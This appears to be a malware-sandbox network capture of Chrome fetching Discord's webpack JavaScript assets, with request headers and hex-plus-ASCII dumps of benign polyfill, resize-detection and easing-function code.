                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 74 3a 72 2c 72 69 67 68 74 3a 69 2c 77 69 64 74 68 3a 73 2c 68 65 69 67 68 74 3a 68 7d 7d 28 61 2c 72 29 29 29 62 72 65 61 6b 3b 73 3d 63 28 73 29 7d 72 65 74 75 72 6e 20 72 7d 7d 2c 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 67 65 74 52 6f 6f 74 52 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 69 66 28 74 68 69 73 2e 72 6f 6f 74 29 74 3d 69 28 74 68 69 73 2e 72 6f 6f 74 29 3b 65 6c 73 65 7b 76 61 72 20 6e 3d 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 6f 3d 65 2e 62 6f 64 79 3b 74 3d 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 2c 72 69 67 68 74 3a 6e 2e 63 6c 69 65 6e 74 57 69 64 74 68 7c 7c 6f 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 77 69 64 74 68 3a 6e 2e 63 6c 69 65 6e 74 57 69
                                                                          Data Ascii: t:r,right:i,width:s,height:h}}(a,r)))break;s=c(s)}return r}},IntersectionObserver.prototype._getRootRect=function(){var t;if(this.root)t=i(this.root);else{var n=e.documentElement,o=e.body;t={top:0,left:0,right:n.clientWidth||o.clientWidth,width:n.clientWi
                                                                          2023-12-10 16:45:10 UTC869INData Raw: 2c 6f 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 6e 2c 6f 7c 7c 21 31 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 74 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 2c 6e 2c 6f 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 6e 2c 6f 7c 7c 21 31 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 74 61 74 63 68 45 76 65
                                                                          Data Ascii: ,o){"function"==typeof t.addEventListener?t.addEventListener(e,n,o||!1):"function"==typeof t.attachEvent&&t.attachEvent("on"+e,n)}function r(t,e,n,o){"function"==typeof t.removeEventListener?t.removeEventListener(e,n,o||!1):"function"==typeof t.detatchEve


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          236192.168.2.549971162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:09 UTC864OUTGET /assets/482.6e1c86f88a37a71d42ec.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=ZSpCVMywQiiVfPT7vOGew6YWOI9N27ZE4E8DXhnYM1s-1702226709260-0-604800000
                                                                          2023-12-10 16:45:10 UTC1122INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 36 33 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 39 35 63 66 66 35 63 36 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:10 GMTContent-Type: application/javascriptContent-Length: 20630Connection: closeCF-Ray: 8336f4e95cff5c6d-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:10 UTC247INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 38 32 22 5d 2c 7b 37 32 34 30 37 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 69 3d 6e 28 22 35 39 30 34 38 34 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 76 61 72 20 65 3d 7b 7d 2c 74 3d 30 2c 6e 3d 30 2c 69 3d 30 3b 72 65 74 75 72 6e 7b 61 64 64 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 72 29 7b 21 72 26 26 28 72 3d 6f 2c 6f 3d 30 29 2c 6f 3e 6e 3f 6e 3d 6f 3a 6f 3c 69 26 26 28 69 3d 6f 29 2c 21 65 5b 6f 5d 26 26 28 65 5b
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["482"],{724079:function(e,t,n){"use strict";n("424973");var i=n("590484");function o(){var e={},t=0,n=0,i=0;return{add:function(o,r){!r&&(r=o,o=0),o>n?n=o:o<i&&(i=o),!e[o]&&(e[
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 6f 5d 3d 5b 5d 29 2c 65 5b 6f 5d 2e 70 75 73 68 28 72 29 2c 74 2b 2b 7d 2c 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 69 3b 74 3c 3d 6e 3b 74 2b 2b 29 7b 66 6f 72 28 76 61 72 20 6f 3d 65 5b 74 5d 2c 72 3d 30 3b 72 3c 6f 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 28 30 2c 6f 5b 72 5d 29 28 29 7d 7d 2c 73 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 7d 7d 7d 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 28 65 3d 65 7c 7c 7b 7d 29 2e 72 65 70 6f 72 74 65 72 2c 72 3d 69 2e 67 65 74 4f 70 74 69 6f 6e 28 65 2c 22 61 73 79 6e 63 22 2c 21 30 29 2c 61 3d 69 2e 67 65 74 4f 70 74 69 6f 6e 28 65 2c 22 61 75 74 6f 22 2c 21 30 29 3b 61 26 26 21 72 26 26 28 6e 26 26
                                                                          Data Ascii: o]=[]),e[o].push(r),t++},process:function(){for(var t=i;t<=n;t++){for(var o=e[t],r=0;r<o.length;r++)(0,o[r])()}},size:function(){return t}}}e.exports=function(e){var t,n=(e=e||{}).reporter,r=i.getOption(e,"async",!0),a=i.getOption(e,"auto",!0);a&&!r&&(n&&
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 29 72 65 74 75 72 6e 20 69 7d 7d 7d 2c 34 36 32 39 31 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 28 22 37 30 31 30 32 22 29 2c 6e 28 22 37 38 31 37 33 38 22 29 3b 76 61 72 20 69 3d 6e 28 22 32 33 33 31 39 33 22 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 28 65 3d 65 7c 7c 7b 7d 29 2e 72 65 70 6f 72 74 65 72 2c 6e 3d 65 2e 62 61 74 63 68 50 72 6f 63 65 73 73 6f 72 2c 6f 3d 65 2e 73 74 61 74 65 48 61 6e 64 6c 65 72 2e 67 65 74 53 74 61 74 65 3b 69 66 28 21 74 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4d 69 73 73 69 6e 67 20 72 65 71 75 69 72 65 64 20 64 65 70 65 6e 64 65 6e 63 79 3a 20 72 65 70 6f 72 74 65 72 2e 22 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29
                                                                          Data Ascii: )return i}}},462913:function(e,t,n){"use strict";n("70102"),n("781738");var i=n("233193");e.exports=function(e){var t=(e=e||{}).reporter,n=e.batchProcessor,o=e.stateHandler.getState;if(!t)throw Error("Missing required dependency: reporter.");function r(e)
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 22 74 72 75 65 22 29 2c 6e 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 75 26 26 65 28 29 3b 21 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 69 66 28 21 74 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 7b 76 61 72 20 69 3d 6f 28 74 29 3b 69 2e 63 68 65 63 6b 46 6f 72 4f 62 6a 65 63 74 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6f 75 74 49 64 26 26 77 69 6e 64 6f 77 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 69 2e 63 68 65 63 6b 46 6f 72 4f 62 6a 65 63 74 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6f 75 74 49 64 29 2c 69 2e 63 68 65 63 6b 46 6f 72 4f 62 6a 65 63 74 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6f 75 74 49 64 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 2e 63 68
                                                                          Data Ascii: ute("aria-hidden","true"),n.onload=function(){!u&&e();!function e(t,n){if(!t.contentDocument){var i=o(t);i.checkForObjectDocumentTimeoutId&&window.clearTimeout(i.checkForObjectDocumentTimeoutId),i.checkForObjectDocumentTimeoutId=setTimeout(function(){i.ch
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 71 75 69 72 65 64 20 64 65 70 65 6e 64 65 6e 63 79 3a 20 72 65 70 6f 72 74 65 72 2e 22 29 3b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 65 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 63 28 5b 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 22 2c 22 77 69 64 74 68 3a 20 31 30 30 30 70 78 22 2c 22 68 65 69 67 68 74 3a 20 31 30 30 30 70 78 22 2c 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 22 2c 22 6d 61 72 67 69 6e 3a 20 30 22 2c 22 70 61 64 64 69 6e 67 3a 20 30 22 5d 29 3b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 74 2e 73 74 79 6c 65 2e 63 73 73 54 65 78
                                                                          Data Ascii: quired dependency: reporter.");var a=function(){var e=document.createElement("div");e.style.cssText=c(["position: absolute","width: 1000px","height: 1000px","visibility: hidden","margin: 0","padding: 0"]);var t=document.createElement("div");t.style.cssTex
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 6f 72 74 61 6e 74 3b 20 22 3a 22 3b 20 22 3b 72 65 74 75 72 6e 28 74 2e 6a 6f 69 6e 28 6e 29 2b 6e 29 2e 74 72 69 6d 28 29 7d 6c 28 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 6e 2c 69 29 7b 69 66 28 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2c 69 29 3b 65 6c 73 65 7b 69 66 28 21 65 2e 61 74 74 61 63 68 45 76 65 6e 74 29 72 65 74 75 72 6e 20 74 2e 65 72 72 6f 72 28 22 5b 73 63 72 6f 6c 6c 5d 20 44 6f 6e 27 74 20 6b 6e 6f 77 20 68 6f 77 20 74 6f 20 61 64 64 20 65 76 65 6e 74 20 6c 69 73 74 65 6e 65 72 73 2e 22 29 3b 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 6e 2c 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 6e 2c 69
                                                                          Data Ascii: ortant; ":"; ";return(t.join(n)+n).trim()}l(window.document);function d(e,n,i){if(e.addEventListener)e.addEventListener(n,i);else{if(!e.attachEvent)return t.error("[scroll] Don't know how to add event listeners.");e.attachEvent("on"+n,i)}}function u(e,n,i
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 78 28 29 7b 72 65 74 75 72 6e 20 32 2a 61 2e 77 69 64 74 68 2b 31 7d 66 75 6e 63 74 69 6f 6e 20 53 28 29 7b 72 65 74 75 72 6e 20 32 2a 61 2e 68 65 69 67 68 74 2b 31 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 72 65 74 75 72 6e 20 65 2b 31 30 2b 78 28 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 65 29 7b 72 65 74 75 72 6e 20 65 2b 31 30 2b 53 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 3d 66 28 65 29 2c 6f 3d 68 28 65 29 2c 72 3d 74 2b 31 30 2b 78 28 29 2c 61 3d 6e 2b 31 30 2b 53 28 29 2c 73 3d 32 2a 74 2b 78 28 29 2c 6c 3d 32 2a 6e 2b 53 28 29 3b 69 2e 73 63 72 6f 6c 6c 4c 65 66 74 3d 72 2c 69 2e 73 63 72 6f 6c 6c 54 6f 70 3d 61 2c 6f 2e 73 63 72 6f 6c 6c 4c 65 66 74 3d 73 2c 6f 2e 73 63 72 6f 6c
                                                                          Data Ascii: }function x(){return 2*a.width+1}function S(){return 2*a.height+1}function k(e){return e+10+x()}function z(e){return e+10+S()}function D(e,t,n){var i=f(e),o=h(e),r=t+10+x(),a=n+10+S(),s=2*t+x(),l=2*n+S();i.scrollLeft=r,i.scrollTop=a,o.scrollLeft=s,o.scrol
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 22 2c 22 66 6c 65 78 3a 20 6e 6f 6e 65 22 2c 22 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 22 2c 22 7a 2d 69 6e 64 65 78 3a 20 2d 31 22 2c 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 22 2c 22 77 69 64 74 68 3a 20 31 30 30 25 22 2c 22 68 65 69 67 68 74 3a 20 31 30 30 25 22 2c 22 6c 65 66 74 3a 20 30 70 78 22 2c 22 74 6f 70 3a 20 30 70 78 22 5d 29 3b 76 61 72 20 67 3d 63 28 5b 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 22 2c 22 66 6c 65 78 3a 20 6e 6f 6e 65 22 2c 22 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 22 2c 22 7a 2d 69 6e 64 65 78 3a 20 2d 31 22 2c 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 22 5d 2e 63 6f 6e 63 61 74 28 28 6e 3d 2d 28 31 2b 68 29 2c 69 3d
                                                                          Data Ascii: ition: absolute","flex: none","overflow: hidden","z-index: -1","visibility: hidden","width: 100%","height: 100%","left: 0px","top: 0px"]);var g=c(["position: absolute","flex: none","overflow: hidden","z-index: -1","visibility: hidden"].concat((n=-(1+h),i=
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 68 69 6c 64 28 44 29 2c 78 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 53 29 2c 66 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 78 29 2c 64 28 6b 2c 22 73 63 72 6f 6c 6c 22 2c 54 29 2c 64 28 44 2c 22 73 63 72 6f 6c 6c 22 2c 43 29 2c 6f 28 6c 29 2e 6f 6e 45 78 70 61 6e 64 53 63 72 6f 6c 6c 3d 54 2c 6f 28 6c 29 2e 6f 6e 53 68 72 69 6e 6b 53 63 72 6f 6c 6c 3d 43 7d 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 6e 2c 69 29 7b 76 61 72 20 6f 3d 66 28 74 29 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2c 72 3d 6e 2b 31 30 2b 78 28 29 2c 61 3d 69 2b 31 30 2b 53 28 29 3b 6f 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 77 69 64 74 68 22 2c 72 2b 22 70 78 22 2c 65 2e 69 6d 70 6f 72 74 61 6e 74 3f 22 69 6d 70 6f 72 74 61 6e 74 22 3a
                                                                          Data Ascii: hild(D),x.appendChild(S),f.appendChild(x),d(k,"scroll",T),d(D,"scroll",C),o(l).onExpandScroll=T,o(l).onShrinkScroll=C}function T(){function a(t,n,i){var o=f(t).childNodes[0],r=n+10+x(),a=i+10+S();o.style.setProperty("width",r+"px",e.important?"important":


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          237192.168.2.549972162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:09 UTC866OUTGET /assets/19263.fe32553ff71153cb7656.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=ZSpCVMywQiiVfPT7vOGew6YWOI9N27ZE4E8DXhnYM1s-1702226709260-0-604800000
                                                                          2023-12-10 16:45:10 UTC1121INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 37 34 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 39 35 63 31 35 36 64 61 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:09 GMTContent-Type: application/javascriptContent-Length: 6743Connection: closeCF-Ray: 8336f4e95c156da9-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:10 UTC248INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 39 32 36 33 22 5d 2c 7b 34 33 37 30 38 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 22 35 36 31 34 34 39 22 29 2c 75 3d 72 28 22 38 37 37 32 39 37 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 75 28 65 28 74 29 29 7d 7d 2c 33 32 39 32 35 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 22 38 37 37 32 39 37 22 29 2c 75 3d 72 28 22 31 36 34 30 39 39 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["19263"],{437083:function(t,n,r){var e=r("561449"),u=r("877297");t.exports=function(t){return u(e(t))}},329252:function(t,n,r){var e=r("877297"),u=r("164099");t.exports=function
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 28 74 29 7b 72 65 74 75 72 6e 20 65 28 75 28 74 29 29 7d 7d 2c 39 35 37 34 37 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 22 36 32 36 37 38 35 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 65 28 6e 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 5b 6e 5d 7d 29 7d 7d 2c 35 36 31 34 34 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 72 3d 2d 31 2c 65 3d 74 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 6e 7c 7c 28 6e 3d 41 72 72 61 79 28 65 29 29 3b 2b 2b 72 3c 65 3b 29 6e 5b 72 5d 3d 74 5b 72 5d 3b 72 65 74 75 72 6e 20 6e 7d 7d 2c 38 37 37 32 39 37 3a 66 75 6e 63 74 69 6f 6e
                                                                          Data Ascii: (t){return e(u(t))}},957478:function(t,n,r){var e=r("626785");t.exports=function(t,n){return e(n,function(n){return t[n]})}},561449:function(t,n,r){t.exports=function(t,n){var r=-1,e=t.length;for(n||(n=Array(e));++r<e;)n[r]=t[r];return n}},877297:function
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 65 49 6e 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 65 29 7b 72 65 74 75 72 6e 28 72 2d 6e 29 2a 28 74 2f 3d 65 29 2a 74 2a 74 2a 74 2a 74 2b 6e 7d 2c 65 61 73 65 4f 75 74 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 65 29 7b 72 65 74 75 72 6e 28 72 2d 6e 29 2a 28 28 74 3d 74 2f 65 2d 31 29 2a 74 2a 74 2a 74 2a 74 2b 31 29 2b 6e 7d 2c 65 61 73 65 49 6e 4f 75 74 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 65 29 7b 76 61 72 20 75 3d 72 2d 6e 3b 72 65 74 75 72 6e 28 74 2f 3d 65 2f 32 29 3c 31 3f 75 2f 32 2a 74 2a 74 2a 74 2a 74 2a 74 2b 6e 3a 75 2f 32 2a 28 28 74 2d 3d 32 29 2a 74 2a 74 2a 74 2a 74 2b 32 29 2b 6e 7d 2c 65 61 73 65 49 6e 53 69 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 65 29
                                                                          Data Ascii: eInQuint:function(t,n,r,e){return(r-n)*(t/=e)*t*t*t*t+n},easeOutQuint:function(t,n,r,e){return(r-n)*((t=t/e-1)*t*t*t*t+1)+n},easeInOutQuint:function(t,n,r,e){var u=r-n;return(t/=e/2)<1?u/2*t*t*t*t*t+n:u/2*((t-=2)*t*t*t*t+2)+n},easeInSine:function(t,n,r,e)
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 3d 69 2c 6f 3d 61 2f 34 29 3a 6f 3d 61 2f 28 32 2a 4d 61 74 68 2e 50 49 29 2a 4d 61 74 68 2e 61 73 69 6e 28 69 2f 75 29 2c 75 2a 4d 61 74 68 2e 70 6f 77 28 32 2c 2d 31 30 2a 74 29 2a 4d 61 74 68 2e 73 69 6e 28 28 74 2a 65 2d 6f 29 2a 28 32 2a 4d 61 74 68 2e 50 49 29 2f 61 29 2b 69 2b 6e 29 7d 2c 65 61 73 65 49 6e 4f 75 74 45 6c 61 73 74 69 63 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 65 29 7b 76 61 72 20 75 2c 61 2c 6f 2c 69 3d 72 2d 6e 3b 72 65 74 75 72 6e 28 6f 3d 31 2e 37 30 31 35 38 2c 61 3d 30 2c 75 3d 69 2c 30 3d 3d 3d 74 29 3f 6e 3a 32 3d 3d 28 74 2f 3d 65 2f 32 29 3f 6e 2b 69 3a 28 21 61 26 26 28 61 3d 65 2a 28 2e 33 2a 31 2e 35 29 29 2c 75 3c 4d 61 74 68 2e 61 62 73 28 69 29 3f 28 75 3d 69 2c 6f 3d 61 2f 34 29 3a 6f 3d 61 2f 28 32 2a 4d 61
                                                                          Data Ascii: =i,o=a/4):o=a/(2*Math.PI)*Math.asin(i/u),u*Math.pow(2,-10*t)*Math.sin((t*e-o)*(2*Math.PI)/a)+i+n)},easeInOutElastic:function(t,n,r,e){var u,a,o,i=r-n;return(o=1.70158,a=0,u=i,0===t)?n:2==(t/=e/2)?n+i:(!a&&(a=e*(.3*1.5)),u<Math.abs(i)?(u=i,o=a/4):o=a/(2*Ma
